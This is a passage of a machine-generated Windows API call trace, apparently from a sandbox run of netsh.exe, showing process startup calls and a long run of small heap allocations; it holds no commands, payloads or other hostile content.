SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6c251a1c0) returned 0x0 [0051.075] __wgetmainargs (in: _Argc=0x7ff6c2527668, _Argv=0x7ff6c2527670, _Env=0x7ff6c2527678, _DoWildCard=0, _StartInfo=0x7ff6c2527684 | out: _Argc=0x7ff6c2527668, _Argv=0x7ff6c2527670, _Env=0x7ff6c2527678) returned 0 [0051.076] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0051.076] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6c2510000 [0051.076] _vsnwprintf (in: _Buffer=0x7ff6c2529b00, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x69b6167618 | out: _Buffer="netsh>") returned 6 [0051.076] GetProcessHeap () returned 0x22b43db0000 [0051.076] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeae0 [0051.076] GetProcessHeap () returned 0x22b43db0000 [0051.076] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe500 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe8c0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbea00 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe5e0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe6a0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe9e0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe6e0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbea20 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe7a0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbea40 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeb00 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe8e0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbea60 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe560 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbea80 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeaa0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe660 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbebe0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeb20 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe960 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeb80 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbec00 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeac0 [0051.077] GetProcessHeap () returned 0x22b43db0000 [0051.077] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe4e0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe7e0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeb40 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe7c0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeb60 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbeba0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbebc0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe820 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbec20 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe800 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe760 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbec40 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe700 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe580 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe6c0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe780 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe520 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbec60 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe900 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe540 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe5a0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe5c0 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe920 [0051.078] GetProcessHeap () returned 0x22b43db0000 [0051.078] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe640 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe600 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe620 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe680 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe720 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe740 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe9a0 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe840 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe860 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe880 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe8a0 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe940 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe980 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbe9c0 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfe00 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0000 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfbe0 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfb00 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbff00 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfdc0 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0020 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfde0 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0060 [0051.079] GetProcessHeap () returned 0x22b43db0000 [0051.079] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfc60 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfe60 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfe80 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfd40 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf940 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfca0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfd60 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfb20 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfac0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf8e0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfee0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf900 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfa80 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfa00 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfcc0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0040 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfe20 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfce0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf9a0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfd80 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfb40 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfe40 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.080] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfae0 [0051.080] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfa60 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfea0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfc20 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbff20 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfd00 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf960 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfaa0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfd20 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfb60 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf920 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf980 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfc40 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf9c0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfc80 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbf9e0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfda0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfb80 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfa40 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfec0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbffa0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfba0 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbff40 [0051.081] GetProcessHeap () returned 0x22b43db0000 [0051.081] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbff60 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfa20 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfbc0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbff80 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbfc00 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbffc0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dbffe0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc00f0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0510 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0690 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc01b0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0830 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0530 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc06d0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc04b0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0590 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0130 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc01d0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0230 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc01f0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc02d0 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.082] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0550 [0051.082] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0710 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc05b0 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc05d0 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0570 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0190 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0270 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0110 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0850 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0790 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0670 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0210 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc05f0 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc02f0 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0610 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0250 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0630 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0650 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc04d0 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0450 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc03d0 [0051.083] GetProcessHeap () returned 0x22b43db0000 [0051.083] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc06b0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc06f0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0350 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0430 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0170 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0470 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0490 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap 